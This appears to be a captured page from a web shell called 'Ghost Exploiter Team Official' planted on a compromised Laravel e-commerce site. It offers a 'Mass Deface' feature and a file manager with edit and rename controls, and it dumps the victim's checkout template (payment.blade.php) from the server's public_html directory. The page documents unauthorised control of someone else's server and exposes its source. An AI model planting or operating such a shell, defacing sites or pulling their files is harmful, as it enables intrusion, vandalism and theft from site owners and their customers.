webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
resources
/
views
/
front
/
checkout
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
billing.blade.php
6.851KB
edt
ren
payment.blade.php
10.814KB
edt
ren
shipping.blade.php
5.584KB
edt
ren
success.blade.php
1.37KB
edt
ren
@extends('master.front') @section('title') {{ __('Payment') }} @endsection @section('content') <!-- Page Title--> <div class="page-title"> <div class="container"> <div class="column"> <ul class="breadcrumbs"> <li><a href="{{ route('front.index') }}">{{ __('Home') }}</a> </li> <li class="separator"></li> <li>{{ __('Review your order and pay') }}</li> </ul> </div> </div> </div> <!-- Page Content--> <div class="container padding-bottom-3x mb-1 checkut-page"> <div class="row"> <!-- Payment Methode--> <div class="col-xl-9 col-lg-8"> <div class="steps flex-sm-nowrap mb-5"> <a class="step" href="{{ route('front.checkout.billing') }}"> <h4 class="step-title"><i class="icon-check-circle"></i>1. {{ __('Invoice to') }}:</h4> </a> <a class="step" href="{{ route('front.checkout.shipping') }}"> <h4 class="step-title"><i class="icon-check-circle"></i>2. {{ __('Ship to') }}:</h4> </a> <a class="step active" href="{{ route('front.checkout.payment') }}"> <h4 class="step-title">3. {{ __('Review and pay') }}</h4> </a> </div> <div class="card"> <div class="card-body"> <h6 class="pb-2 widget-title2">{{ __('Review Your Order') }} :</h6> <div class="row"> <div class="col-sm-6 mb-4"> <h6 class="fz-16-bold">{{ __('Invoice address') }} :</h6> @php $ship = Session::get('shipping_address'); $bill = Session::get('billing_address'); @endphp <ul class="list-unstyled"> <li><span class="text-muted pay-label">{{ __('Name') }}: </span>{{ $ship['ship_first_name'] }} {{ $ship['ship_last_name'] }}</li> @if (PriceHelper::CheckDigital()) <li><span class="text-muted pay-label">{{ __('Address') }}: </span>{{ $ship['ship_address1'] }} {{ $ship['ship_address2'] }}</li> @endif <li><span class="text-muted pay-label">{{ __('Phone') }}: </span>{{ $ship['ship_phone'] }} </li> </ul> </div> <div class="col-sm-6 mb-4"> <h6 class="fz-16-bold">{{ __('Shipping address') }} :</h6> <ul class="list-unstyled"> <li><span class="text-muted pay-label">{{ __('Name') }}: </span>{{ $bill['bill_first_name'] }} {{ $bill['bill_last_name'] }}</li> @if (PriceHelper::CheckDigital()) <li><span class="text-muted pay-label">{{ __('Address') }}: </span>{{ $ship['ship_address1'] }} {{ $ship['ship_address2'] }}</li> @endif <li><span class="text-muted pay-label">{{ __('Phone') }}: </span>{{ $bill['bill_phone'] }} </li> </ul> </div> </div> <h6 class="pb-2 widget-title2">{{ __('Shipping Options') }} :</h6> <div class="row"> <div class="col-sm-6 mb-4"> @if (PriceHelper::CheckDigital() == true) @php $free_shipping = DB::table('shipping_services')->whereStatus(1)->whereIsCondition(1)->first(); @endphp <select name="shipping_id" class="form-control" id="shipping_id_select" required> <option value="" selected disabled>{{ __('Select Shipping Method') }}</option> @foreach (DB::table('shipping_services')->whereStatus(1)->get() as $shipping) @if ($shipping->id == 1 && isset($free_shipping) && $free_shipping->minimum_price <= $cart_total) <option value="{{ $shipping->id }}" data-href="{{ route('front.shipping.setup') }}">{{ $shipping->title }} </option> @else @if ($shipping->id != 1) <option value="{{ $shipping->id }}" data-href="{{ route('front.shipping.setup') }}">{{ $shipping->title }} ({{ PriceHelper::setCurrencyPrice($shipping->price) }}) </option> @endif @endif @endforeach </select> <small class="text-primary shipping_message">{{ __('Please select shipping method') }}</small> @error('shipping_id') <p class="text-danger shipping_message">{{ $message }}</p> @enderror @endif </div> <div class="col-sm-6 mb-4"> @if (PriceHelper::CheckDigital() == true) @if (DB::table('states')->whereStatus(1)->count() > 0) <select name="state_id" class="form-control" id="state_id_select" required> <option value="" selected disabled>{{ __('Select Shipping State') }}</option> @foreach (DB::table('states')->whereStatus(1)->get() as $state) <option value="{{ $state->id }}" data-href="{{ route('front.state.setup') }}" {{ Auth::check() && Auth::user()->state_id == $state->id ? 'selected' : '' }}> {{ $state->name }} @if ($state->type == 'fixed') ({{ PriceHelper::setCurrencyPrice($state->price) }}) @else ({{ $state->price }}%) @endif </option> @endforeach </select> <small class="text-primary state_message">{{ __('Please select shipping state') }}</small> @error('state_id') <p class="text-danger state_message">{{ $message }}</p> @enderror @endif @endif </div> </div> <h6 class="pb-2 widget-title2">{{ __('Pay With') }} :</h6> <div class="row mt-4"> <div class="col-12"> <div class="payment-methods"> @php $gateways = DB::table('payment_settings')->whereStatus(1)->get(); @endphp @foreach ($gateways as $gateway) @if (PriceHelper::CheckDigitalPaymentGateway()) @if ($gateway->unique_keyword != 'cod') <div class="single-payment-method"> <a class="text-decoration-none " href="#" data-bs-toggle="modal" data-bs-target="#{{ $gateway->unique_keyword }}"> <img class="" src="{{ asset('assets/images/' . $gateway->photo) }}" alt="{{ $gateway->name }}" title="{{ $gateway->name }}"> <p>{{ $gateway->name }}</p> </a> </div> @endif @else <div class="single-payment-method"> <a class="text-decoration-none" href="#" data-bs-toggle="modal" data-bs-target="#{{ $gateway->unique_keyword }}"> <img class="" src="{{ asset('assets/images/' . $gateway->photo) }}" alt="{{ $gateway->name }}" title="{{ $gateway->name }}"> <p>{{ $gateway->name }}</p> </a> </div> @endif @endforeach </div> </div> </div> </div> </div> @include('includes.checkout_modal') </div> @include('includes.checkout_sitebar', $cart) </div> </div> @endsection